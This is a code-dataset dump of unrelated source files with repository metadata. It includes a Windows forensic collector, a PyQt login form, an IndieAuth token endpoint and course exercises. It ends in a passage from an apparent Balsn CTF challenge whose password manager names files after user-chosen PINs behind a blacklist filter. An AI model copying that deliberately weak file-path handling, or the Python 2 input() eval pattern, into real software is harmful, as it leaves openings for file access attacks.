hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
13868f879246c68859ec6c33940fb1a1f22bad69
| 3,395 |
py
|
Python
|
Fastir_Collector/fs/windowsVistaFiles.py
|
Unam3dd/Train-2018-2020
|
afb6ae70fe338cbe55a21b74648d91996b818fa2
|
[
"MIT"
] | 4 |
2021-04-23T15:39:17.000Z
|
2021-12-27T22:53:24.000Z
|
Fastir_Collector/fs/windowsVistaFiles.py
|
Unam3dd/Train-2018-2020
|
afb6ae70fe338cbe55a21b74648d91996b818fa2
|
[
"MIT"
] | null | null | null |
Fastir_Collector/fs/windowsVistaFiles.py
|
Unam3dd/Train-2018-2020
|
afb6ae70fe338cbe55a21b74648d91996b818fa2
|
[
"MIT"
] | 2 |
2021-04-19T08:28:54.000Z
|
2022-01-19T13:23:29.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from fs import _FS
class WindowsVistaFiles(_FS):
def __init__(self, params):
super(WindowsVistaFiles, self).__init__(params)
self.userprofile = params['USERPROFILE']
def __list_named_pipes(self):
return super(WindowsVistaFiles, self)._list_named_pipes()
def _list_windows_prefetch(self):
return super(WindowsVistaFiles, self)._list_windows_prefetch()
def _chrome_history(self):
return super(WindowsVistaFiles, self)._chrome_history(
'\\Users\\*\\AppData\\Local\\Google\\Chrome\\User Data\\*\\History')
def _firefox_history(self):
return super(WindowsVistaFiles, self)._firefox_history(
'\\Users\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\places.sqlite')
def csv_print_list_named_pipes(self):
super(WindowsVistaFiles, self)._csv_list_named_pipes(self._list_named_pipes())
def csv_print_list_windows_prefetch(self):
super(WindowsVistaFiles, self)._csv_windows_prefetch(self._list_windows_prefetch())
def csv_skype_history(self):
super(WindowsVistaFiles, self)._skype_history(['AppData\\Roaming\\Skype'])
def csv_ie_history(self):
super(WindowsVistaFiles, self)._ie_history(['AppData\\Local\\Microsoft\\Windows\\*\\History.IE5',
'AppData\\Local\\Microsoft\\Windows\\*\\Low\\History.IE5'])
def csv_firefox_history(self):
super(WindowsVistaFiles, self)._csv_firefox_history(self._firefox_history())
def csv_chrome_history(self):
super(WindowsVistaFiles, self)._csv_chrome_history(self._chrome_history())
def csv_firefox_downloads(self):
super(WindowsVistaFiles, self)._firefox_downloads(
['AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\downloads.sqlite'])
def csv_get_startup_files(self):
super(WindowsVistaFiles, self)._csv_get_startup_files(
self.userprofile + '\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*')
def json_print_list_named_pipes(self):
super(WindowsVistaFiles, self)._json_list_named_pipes(self._list_named_pipes())
def json_print_list_windows_prefetch(self):
super(WindowsVistaFiles, self)._json_windows_prefetch(self._list_windows_prefetch())
def json_skype_history(self):
super(WindowsVistaFiles, self)._skype_history(['AppData\\Roaming\\Skype'])
def json_ie_history(self):
super(WindowsVistaFiles, self)._ie_history(['AppData\\Local\\Microsoft\\Windows\\*\\History.IE5',
'AppData\\Local\\Microsoft\\Windows\\*\\Low\\History.IE5'])
def json_firefox_history(self):
super(WindowsVistaFiles, self)._json_firefox_history(self._firefox_history())
def json_chrome_history(self):
super(WindowsVistaFiles, self)._json_chrome_history(self._chrome_history())
def json_firefox_downloads(self):
super(WindowsVistaFiles, self)._firefox_downloads(
['AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\downloads.sqlite'])
def json_get_startup_files(self):
super(WindowsVistaFiles, self)._json_get_startup_files(
self.userprofile + '\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*')
| 43.525641 | 111 | 0.697791 |
b9f599563bea1f46bb7c67209476021b9ef4c064
| 68 |
py
|
Python
|
Python/070-Input().py
|
sadikkuzu/HackerRank
|
2b1ed2cf41f6a5404c5b9293186f301b646b5d33
|
[
"Apache-2.0"
] | 5 |
2019-03-09T22:44:01.000Z
|
2021-09-14T00:11:38.000Z
|
Python/070-Input().py
|
jguerra7/HackerRank-4
|
7e1663d0050ffbb0fd885b8affdada9ea13b0e80
|
[
"Apache-2.0"
] | 4 |
2018-08-16T09:39:47.000Z
|
2018-09-14T17:37:07.000Z
|
Python/070-Input().py
|
jguerra7/HackerRank-4
|
7e1663d0050ffbb0fd885b8affdada9ea13b0e80
|
[
"Apache-2.0"
] | 1 |
2020-06-01T23:38:35.000Z
|
2020-06-01T23:38:35.000Z
|
[x, y] = [int(c) for c in raw_input().split(' ')]
print y == input()
| 34 | 49 | 0.544118 |
4c0967b1d662aca0bb4916d669b727edc68fb383
| 160 |
py
|
Python
|
exercises/ja/exc_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/exc_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/exc_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
import spacy
# 「ja_core_news_sm」モデルをロード
nlp = ____
text = "公式発表:Appleが米国の上場企業として初めて時価評価額1兆ドルに到達しました。"
# テキストを処理
doc = ____
# docのテキストをプリント
print(____.____)
| 12.307692 | 50 | 0.76875 |
4c4e52e055f36405d43c1b30f4fe24587419d647
| 8,074 |
py
|
Python
|
publ/tokens.py
|
fluffy-critter/Publ
|
868c5a17c605707dde4d1a95d79405301bd12f05
|
[
"MIT"
] | 6 |
2018-03-29T02:07:44.000Z
|
2018-09-26T00:17:31.000Z
|
publ/tokens.py
|
fluffy-critter/Publ
|
868c5a17c605707dde4d1a95d79405301bd12f05
|
[
"MIT"
] | 82 |
2018-04-01T08:53:59.000Z
|
2018-09-28T23:45:05.000Z
|
publ/tokens.py
|
fluffy-critter/Publ
|
868c5a17c605707dde4d1a95d79405301bd12f05
|
[
"MIT"
] | null | null | null |
""" IndieAuth token endpoint """
import functools
import json
import logging
import time
import typing
import urllib.parse
import arrow
import flask
import itsdangerous
import requests
import werkzeug.exceptions as http_error
from pony import orm
from . import model, utils
from .config import config
LOGGER = logging.getLogger(__name__)
def signer(context: str):
""" Gets the signer/validator for the tokens """
from .flask_wrapper import current_app
return itsdangerous.URLSafeSerializer(str(current_app.secret_key) + context)
def get_token(id_url: str, lifetime: int, scope: str = None, context: str = '') -> str:
""" Gets a signed token for the given identity"""
token = {'me': utils.canonicize_url(id_url)}
if scope:
token['scope'] = scope
return signer(context).dumps((token, int(time.time() + lifetime)))
def parse_token(token: str, context: str = '') -> typing.Dict[str, str]:
""" Parse a bearer token to get the stored data """
try:
ident, expires = signer(context).loads(token)
except itsdangerous.BadData as error:
LOGGER.error("Got token parse error: %s", error)
flask.g.token_error = 'Invalid token' # pylint:disable=assigning-non-slot
raise http_error.Unauthorized('Invalid token') from error
if expires < time.time():
LOGGER.info("Got expired token for %s", ident['me'])
flask.g.token_error = "Token expired" # pylint:disable=assigning-non-slot
raise http_error.Unauthorized("Token expired")
return ident
def request(user):
""" Called whenever an authenticated access fails; marks authentication
as being upgradeable.
Currently this is unused by Publ itself, but a site can make use of it to
e.g. add a ``WWW-Authenticate`` header or the like in a post-request hook.
"""
if not user:
flask.g.needs_auth = True # pylint:disable=assigning-non-slot
def send_auth_ticket(subject: str,
resource: str,
endpoint: str,
scope: str = None):
""" Initiate the TicketAuth flow """
from .flask_wrapper import current_app
def _submit():
ticket = get_token(subject, config.ticket_lifetime, scope, context='ticket')
req = requests.post(endpoint, data={
'ticket': ticket,
'resource': resource,
'subject': subject
})
LOGGER.info("Auth ticket sent to %s for %s: %d %s",
endpoint, subject, req.status_code, req.text)
# Use the indexer's threadpool to issue the ticket in the background
current_app.indexer.submit(_submit)
@orm.db_session()
def log_grant(identity: str):
""" Update the user table with the granted token """
import authl.handlers.indieauth
values = {
'last_token': arrow.utcnow().datetime,
}
profile = authl.handlers.indieauth.get_profile(identity)
if profile:
values['profile'] = profile
record = model.KnownUser.get(user=identity)
if record:
record.set(**values)
else:
record = model.KnownUser(user=identity,
**values,
last_seen=arrow.utcnow().datetime)
def redeem_grant(grant_type: str, auth_token: str):
""" Redeem a grant from a provided redemption ticket """
grant = parse_token(auth_token, grant_type)
LOGGER.info("Redeeming %s for %s; scopes=%s", grant_type, grant['me'],
grant.get('scope'))
scope = grant.get('scope', '')
token = get_token(grant['me'], config.token_lifetime, scope)
response = {
'access_token': token,
'token_type': 'Bearer',
'me': grant['me'],
'expires_in': config.token_lifetime,
'refresh_token': get_token(grant['me'],
config.refresh_token_lifetime,
scope,
context='refresh_token')
}
if scope:
response['scope'] = scope
log_grant(grant['me'])
return json.dumps(response), {'Content-Type': 'application/json'}
@functools.lru_cache()
def get_ticket_endpoint(me_url: str):
""" Get the IndieAuth Ticket Auth endpoint and the canonical identity URL """
LOGGER.debug("get_ticket_endpoint %s", me_url)
import authl.handlers.indieauth
from bs4 import BeautifulSoup
req = authl.utils.request_url(me_url)
content = BeautifulSoup(req.text, 'html.parser')
if req.links and 'canonical' in req.links:
canonical_url = req.links['canonical']['url']
else:
link = content.find('link', rel='canonical')
if link:
canonical_url = urllib.parse.urljoin(me_url, link.get('href'))
else:
canonical_url = me_url
if utils.canonicize_url(canonical_url) != utils.canonicize_url(me_url):
# We have a rel="canonical" which mismatches the provided identity URL
LOGGER.debug("%s -> canonical=%s", me_url, canonical_url)
endpoint, me_url = authl.handlers.indieauth.find_endpoint(canonical_url,
rel='ticket_endpoint')
else:
# Use our fetch to seed Authl's endpoint fetch and get that instead
endpoints, me_url = authl.handlers.indieauth.find_endpoints(me_url,
req.links, content)
endpoint = endpoints.get('ticket_endpoint')
LOGGER.debug("%s %s", me_url, endpoint)
return endpoint, me_url
def ticket_request(me_url: str, scope: str):
""" Initiate a ticket request """
try:
endpoint, me_url = get_ticket_endpoint(utils.canonicize_url(me_url))
except RuntimeError:
endpoint = None
if not endpoint:
raise http_error.BadRequest("Could not get ticket endpoint")
LOGGER.info("endpoint: %s", endpoint)
send_auth_ticket(me_url, flask.request.url_root, endpoint, scope)
return "Ticket sent", 202
def parse_authorization_header(header):
""" Parse an Authorization: header from an HTTP request into token """
parts = header.split()
if len(parts) < 2:
raise http_error.BadRequest("Malformed authorization header")
if parts[0].lower() == 'bearer':
token = parse_token(parts[1])
return token
raise http_error.BadRequest(f"Unknown authorization type '{parts[0]}'")
def indieauth_endpoint():
""" IndieAuth token endpoint """
if 'grant_type' in flask.request.form:
# token grant
if flask.request.form['grant_type'] == 'ticket':
# TicketAuth
if 'ticket' not in flask.request.form:
raise http_error.BadRequest("Missing ticket")
return redeem_grant('ticket', flask.request.form['ticket'])
if flask.request.form['grant_type'] == 'refresh_token':
# Refresh token redemption
if 'refresh_token' not in flask.request.form:
raise http_error.BadRequest("Missing refresh_token")
return redeem_grant('refresh_token', flask.request.form['refresh_token'])
raise http_error.BadRequest("Unknown grant type")
if 'action' in flask.request.form:
# provisional ticket request flow, per https://github.com/indieweb/indieauth/issues/87
if flask.request.form['action'] == 'ticket' and 'subject' in flask.request.form:
return ticket_request(flask.request.form['subject'],
flask.request.form.get('scope', ''))
raise http_error.BadRequest()
if 'Authorization' in flask.request.headers:
# ticket verification
token = parse_authorization_header(flask.request.headers['Authorization'])
return json.dumps(token), {'Content-Type': 'application/json'}
if 'me' in flask.request.args:
# ad-hoc ticket request
return ticket_request(flask.request.args['me'],
flask.request.args.get('scope', ''))
raise http_error.BadRequest()
| 33.92437 | 94 | 0.630419 |
4c69651efeb7fa6870e433061a12e8cdd6c2e2fc
| 608 |
py
|
Python
|
imgtl/const.py
|
reviforks/imgtl
|
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
|
[
"MIT"
] | null | null | null |
imgtl/const.py
|
reviforks/imgtl
|
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
|
[
"MIT"
] | null | null | null |
imgtl/const.py
|
reviforks/imgtl
|
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*
from collections import OrderedDict
BASE_URL = 'https://img.tl/%s'
# SERVERS
SERVERS = OrderedDict((
('S1', 's1.img.tl'),
('S2', 's2.img.tl'),
))
# OBJ_TYPE
TYPE_IMAGE = 1
TYPE_FILE = 2
TYPE_TEXT = 3
# EXPIRE_BEHAVIOR
EXPIRE_BEHAVIORS = (
'delete',
'private',
)
USER_DEFAULT_ICON = BASE_URL % 'img/user_icon.png'
USERNAME_BLACKLIST = ['admin', 'root', 'mail', 'beta', 'test', 'static']
URL_BLACKLIST = ['login', 'signup', 'logout', 'upload', 'img', 'css', 'js', 'fonts']
AVAILABLE_FORMAT = ['JPEG', 'PNG', 'GIF', 'SVG']
ADMIN_IDS = (1, )
| 18.424242 | 84 | 0.616776 |
d5bdc8662b74e93d4537ef87964eb33ced8a8711
| 366 |
py
|
Python
|
python/en/archive/dropbox/ec2-oregon/lid_core.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/ec2-oregon/lid_core.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/ec2-oregon/lid_core.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
lid_core.py
"""
# Custom package
from utils import makedirs_if_absent
from utils import save2wav
def identify_language( device_id_, sampling_rate_, payload_ ):
file = save2wav( device_id, SAMPLING_RATE, payload )
print('hello')
# preprocess( payload, SAMPLING_RATE, WINDOW_LENGTH, WINDOW_STEP, NUM_FEATURES )
| 24.4 | 84 | 0.721311 |
e6a5be7ec77a57ca811ac7abe02cbab84ce3bf04
| 1,107 |
py
|
Python
|
python/oneflow/compatible/single_client/layers.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 3,285 |
2020-07-31T05:51:22.000Z
|
2022-03-31T15:20:16.000Z
|
python/oneflow/compatible/single_client/layers.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 2,417 |
2020-07-31T06:28:58.000Z
|
2022-03-31T23:04:14.000Z
|
python/oneflow/compatible/single_client/layers.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 520 |
2020-07-31T05:52:42.000Z
|
2022-03-29T02:38:11.000Z
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from oneflow.compatible.single_client.ops.categorical_ordinal_encode_op import (
categorical_ordinal_encoder,
)
from oneflow.compatible.single_client.ops.layers import (
batch_normalization,
batch_normalization_add_relu,
batch_normalization_relu,
conv1d,
conv2d,
conv3d,
dense,
layer_norm,
layer_norm_grad,
layer_norm_param_grad,
)
from oneflow.compatible.single_client.ops.layers import upsample as upsample_2d
from oneflow.compatible.single_client.ops.prelu import prelu
| 33.545455 | 80 | 0.789521 |
e6fadb87ec4f2e48c3ab3d2f8ece993d29a2ec51
| 327 |
py
|
Python
|
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | null | null | null |
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | null | null | null |
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | 1 |
2022-02-23T13:03:14.000Z
|
2022-02-23T13:03:14.000Z
|
length = int(input())
width = int(input())
height = int(input())
occupied = float(input())
occupied_percent = occupied / 100
full_capacity = length * width * height
occupied_total = occupied_percent * full_capacity
remaining = full_capacity - occupied_total
capacity_in_dm = remaining / 1000
water = capacity_in_dm
print(water)
| 29.727273 | 49 | 0.767584 |
075a93632cbfe8a22160427cf0df0508357d9411
| 6,288 |
py
|
Python
|
Admin/res/signIn.py
|
BlaCkinkGJ/SFSH
|
0134f1e4698ef34caee2d5a8cd875c51507b3527
|
[
"MIT"
] | 1 |
2019-02-28T08:39:55.000Z
|
2019-02-28T08:39:55.000Z
|
Admin/res/signIn.py
|
BlaCkinkGJ/SFSH
|
0134f1e4698ef34caee2d5a8cd875c51507b3527
|
[
"MIT"
] | 5 |
2018-07-17T13:09:34.000Z
|
2018-09-11T13:55:33.000Z
|
Admin/res/signIn.py
|
BlaCkinkGJ/SFSH
|
0134f1e4698ef34caee2d5a8cd875c51507b3527
|
[
"MIT"
] | 2 |
2019-05-17T03:07:08.000Z
|
2022-01-01T07:04:31.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'signIn.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
from res import signUp, status
import pipeline as pipe
from PyQt5.QtWidgets import QMessageBox as msgbox
class Ui_Form(object):
def setupUi(self, Form):
pipe.db.changeCollection(pipe.info['loginDB'])
Form.setObjectName("Form")
Form.resize(338, 277)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth())
Form.setSizePolicy(sizePolicy)
self.frame_8 = QtWidgets.QFrame(Form)
self.frame_8.setGeometry(QtCore.QRect(10, 10, 321, 261))
self.frame_8.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame_8.setFrameShadow(QtWidgets.QFrame.Plain)
self.frame_8.setLineWidth(19)
self.frame_8.setMidLineWidth(0)
self.frame_8.setObjectName("frame_8")
self.MainLabel = QtWidgets.QLabel(self.frame_8)
self.MainLabel.setGeometry(QtCore.QRect(30, 10, 261, 51))
font = QtGui.QFont()
font.setFamily("나눔스퀘어라운드 ExtraBold")
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.MainLabel.setFont(font)
self.MainLabel.setTextFormat(QtCore.Qt.PlainText)
self.MainLabel.setAlignment(QtCore.Qt.AlignCenter)
self.MainLabel.setObjectName("MainLabel")
self.LogInBox = QtWidgets.QGroupBox(self.frame_8)
self.LogInBox.setGeometry(QtCore.QRect(10, 70, 301, 181))
font = QtGui.QFont()
font.setFamily("나눔스퀘어 Bold")
font.setBold(True)
font.setWeight(75)
self.LogInBox.setFont(font)
self.LogInBox.setObjectName("LogInBox")
self.layoutWidget_2 = QtWidgets.QWidget(self.LogInBox)
self.layoutWidget_2.setGeometry(QtCore.QRect(50, 120, 202, 34))
self.layoutWidget_2.setObjectName("layoutWidget_2")
self.Button = QtWidgets.QHBoxLayout(self.layoutWidget_2)
self.Button.setContentsMargins(0, 0, 0, 0)
self.Button.setObjectName("Button")
self.SignIn = QtWidgets.QPushButton(self.layoutWidget_2)
font = QtGui.QFont()
font.setFamily("나눔스퀘어 Bold")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.SignIn.setFont(font)
self.SignIn.setObjectName("SignIn")
self.Button.addWidget(self.SignIn)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.Button.addItem(spacerItem)
self.SignUp = QtWidgets.QPushButton(self.layoutWidget_2)
font = QtGui.QFont()
font.setFamily("나눔스퀘어 Bold")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.SignUp.setFont(font)
self.SignUp.setObjectName("SignUp")
self.Button.addWidget(self.SignUp)
self.Password = QtWidgets.QLabel(self.LogInBox)
self.Password.setGeometry(QtCore.QRect(30, 80, 81, 16))
font = QtGui.QFont()
font.setFamily("나눔스퀘어 Bold")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.Password.setFont(font)
self.Password.setObjectName("Password")
self.PasswordText = QtWidgets.QLineEdit(self.LogInBox)
self.PasswordText.setGeometry(QtCore.QRect(140, 80, 113, 21))
self.PasswordText.setObjectName("PasswordText")
self.PasswordText.setEchoMode(QtWidgets.QLineEdit.Password)
self.UsernameText = QtWidgets.QLineEdit(self.LogInBox)
self.UsernameText.setGeometry(QtCore.QRect(140, 40, 113, 21))
self.UsernameText.setObjectName("UsernameText")
self.Username = QtWidgets.QLabel(self.LogInBox)
self.Username.setGeometry(QtCore.QRect(30, 40, 81, 16))
font = QtGui.QFont()
font.setFamily("나눔스퀘어 Bold")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.Username.setFont(font)
self.Username.setObjectName("Username")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
Form.setTabOrder(self.UsernameText, self.PasswordText)
Form.setTabOrder(self.PasswordText, self.SignIn)
Form.setTabOrder(self.SignIn, self.SignUp)
self.SignIn.clicked.connect(self.signInButton)
self.SignUp.clicked.connect(self.signUpButton)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "작업자 통합 관리 시스템"))
self.MainLabel.setText(_translate("Form", "작업자 통합 관리시스템"))
self.LogInBox.setTitle(_translate("Form", "Log-in"))
self.SignIn.setText(_translate("Form", "Sign In"))
self.SignUp.setText(_translate("Form", "Sign Up"))
self.Password.setText(_translate("Form", "Password"))
self.Username.setText(_translate("Form", "Username"))
def signInButton(self):
import hashlib
username = self.UsernameText.text()
password = self.PasswordText.text()
password = hashlib.sha256(password.encode()).hexdigest()
isExist = pipe.db.collection.find_one({'username': username, 'password': password}) is not None
if isExist:
temp = pipe.window
pipe.window = QtWidgets.QWidget()
pipe.ui = status.Ui_Form()
pipe.ui.setupUi(pipe.window)
pipe.window.show()
temp.close()
else:
msgbox.question(pipe.window, '로그인 실패', '계정을 찾을 수 없습니다.', msgbox.Yes, msgbox.Yes)
def signUpButton(self):
temp = pipe.window
pipe.window = QtWidgets.QWidget()
pipe.ui = signUp.Ui_Form()
pipe.ui.setupUi(pipe.window)
pipe.window.show()
temp.close()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Form = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys.exit(app.exec_())
| 39.797468 | 114 | 0.661737 |
4aeff121214dfee78d86d9c96293458a719dadb5
| 957 |
py
|
Python
|
skripte/interface.py
|
Ilaris-Tools/IlarisDB
|
9608afa0ebc69c2bbc13af939cb2c71321f5da37
|
[
"MIT"
] | null | null | null |
skripte/interface.py
|
Ilaris-Tools/IlarisDB
|
9608afa0ebc69c2bbc13af939cb2c71321f5da37
|
[
"MIT"
] | 4 |
2022-03-13T22:56:35.000Z
|
2022-03-16T11:33:27.000Z
|
skripte/interface.py
|
Ilaris-dev/IlarisDB
|
9608afa0ebc69c2bbc13af939cb2c71321f5da37
|
[
"MIT"
] | null | null | null |
import yaml
import yamale
class NoAliasDumper(yaml.SafeDumper):
def ignore_aliases(self, data):
return True
def load(table):
with open(f"../daten/{table}.yml", "r") as table_file:
table_data = yaml.load(table_file)
return table_data
def validate(table, data=None, schemaf=None):
if schemaf:
schema = yamale.make_schema(f'../schemata/{schemaf}.yml')
else:
schema = yamale.make_schema(f'../schemata/{table}.yml')
if data is None:
data = yamale.make_data(f'../daten/{table}.yml')
yamale.validate(schema, data, strict=True)
print("\nYaY! Datei ist ok :)")
return True
def save(table, data, validate=False):
if validate:
validate(table, data)
dump = yaml.dump(data, default_flow_style=False,
allow_unicode=True, Dumper=NoAliasDumper)
with open(f"../daten/{table}.yml", "w", encoding='utf8') as table_file:
table_file.write(dump)
| 27.342857 | 75 | 0.642633 |
91ab5c73aaba0afcc0b14306a9cc3bed5d7b43e5
| 623 |
py
|
Python
|
musterloesungen/4.4/hypotenuse.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
musterloesungen/4.4/hypotenuse.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
musterloesungen/4.4/hypotenuse.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Kurs: Python: Grundlagen der Programmierung für Nicht-Informatiker
# Semester: Herbstsemester 2018
# Homepage: http://accaputo.ch/kurs/python-uzh-hs-2018/
# Author: Giuseppe Accaputo
# Aufgabe: 4.4
import math
def hypotenuse(a,b):
if a < 0 or b < 0:
return
summe_quadrat = a**2 + b**2
c = math.sqrt(summe_quadrat)
return c
print(hypotenuse(0,0))
print(hypotenuse(3,4))
hypotenuse_mit_negativer_seitenlaenge = hypotenuse(-1,2)
if hypotenuse_mit_negativer_seitenlaenge == None:
print("Fehler: Eine negative Seitenlänge wurde angegeben")
| 24.92 | 76 | 0.680578 |
72a6db606e9525b89423c77424977159dbbc1bed
| 27 |
py
|
Python
|
my-cs/intern/java_details/java_sort_selection_details/__init__.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
my-cs/intern/java_details/java_sort_selection_details/__init__.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | 15 |
2015-03-07T12:46:41.000Z
|
2015-04-11T09:08:36.000Z
|
buffer/scripts-emb-ext/projects/v8-wrap-gen/sources/v8_api_gen_r16258/matrix.py
|
zaqwes8811/micro-apps
|
7f63fdf613eff5d441a3c2c7b52d2a3d02d9736a
|
[
"MIT"
] | null | null | null |
__author__ = 'zaqwes_user'
| 13.5 | 26 | 0.777778 |
a3e009ccf40de5e9b3b42baa9e366d10feb5593c
| 5,956 |
py
|
Python
|
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
import os
import shutil
base_dir = f"C:\\Users\\balsnctf\\Documents\\Dark Knight\\tmp-{os.urandom(16).hex()}"
def init():
os.mkdir(base_dir)
os.chdir(base_dir)
with open("39671", "w") as f:
f.write("alice\nalice1025")
with open("683077", "w") as f:
f.write("bob\nbob0105a")
def password_manager():
print("use a short pin code to achieve fast login!!")
while True:
pin = input("enter a pin code > ")
if len(pin) > 100:
print("too long...")
continue
if "\\" in pin or "/" in pin or ".." in pin or "*" in pin:
print("what do you want to do?(¬_¬)")
continue
flag = True
for c in pin.encode("utf8"):
if c > 0x7e or c < 0x20:
print("printable chars only!!")
flag = False
break
if flag:
break
while True:
username = input("enter username > ")
if len(username) > 100:
print("too long...")
continue
for c in username.encode("utf8"):
if c > 0x7e or c < 0x20:
print("printable chars only!!")
flag = False
break
if flag:
break
while True:
password = input("enter password > ")
if len(password) > 100:
print("too long...")
continue
for c in password.encode("utf8"):
